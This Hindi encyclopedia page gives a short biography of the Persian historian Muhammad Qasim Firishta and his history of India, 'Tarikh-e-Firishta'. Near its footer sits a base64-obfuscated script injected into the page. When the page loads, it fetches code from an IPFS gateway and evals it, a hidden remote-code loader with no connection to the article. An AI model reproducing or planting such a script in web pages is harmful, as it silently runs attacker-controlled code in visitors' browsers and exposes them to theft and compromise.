फ़रिश्ता (यात्री)

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

फ़रिश्ता, मुहम्मद क़ासिम
(1570-1612)

  • फ़रिश्ता एक प्रसिद्ध इतिहासकार, जिसने फ़ारसी में इतिहास लिखा है।
  • फ़रिश्ता का जन्म फ़ारस में 'कैस्पियन सागर' के तट पर 'अस्त्राबाद' में हुआ था।
  • वह युवावस्था में अपने पिता के साथ अहमदाबाद आया और वहाँ 1589 ई. तक रहा।
  • इसके बाद वह बीजापुर चला गया, जहाँ उसने सुल्तान इब्राहीम आदिलशाह द्वितीय का संरक्षण प्राप्त किया।
  • सुल्तान ने उससे भारत का इतिहास लिखने को कहा।
  • यह कार्य उसने 1609 ई. में पूरा किया।
  • उसके द्वारा लिखा गया भारत का इतिहास 'तारीख़े फ़रिश्ता' के नाम से विख्यात है।
  • ब्रिग्स ने उसकी पुस्तक का अंग्रेज़ी में अनुवाद किया 'भारत में मुसलमानी शक्ति के विकास का इतिहास' नाम से किया है।
  • उसकी मृत्यु 1612 ई. में बीजापुर में हुई।
  • पूर्वी देशों के इतिहासकारों में वह अधिक विश्वसनीय है।
  • उसका प्रसिद्ध इतिहास ग्रन्थ आज भी भारत में मुसलमानों के शासनकाल पर सबसे प्रामाणिक माना जाता है।





पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ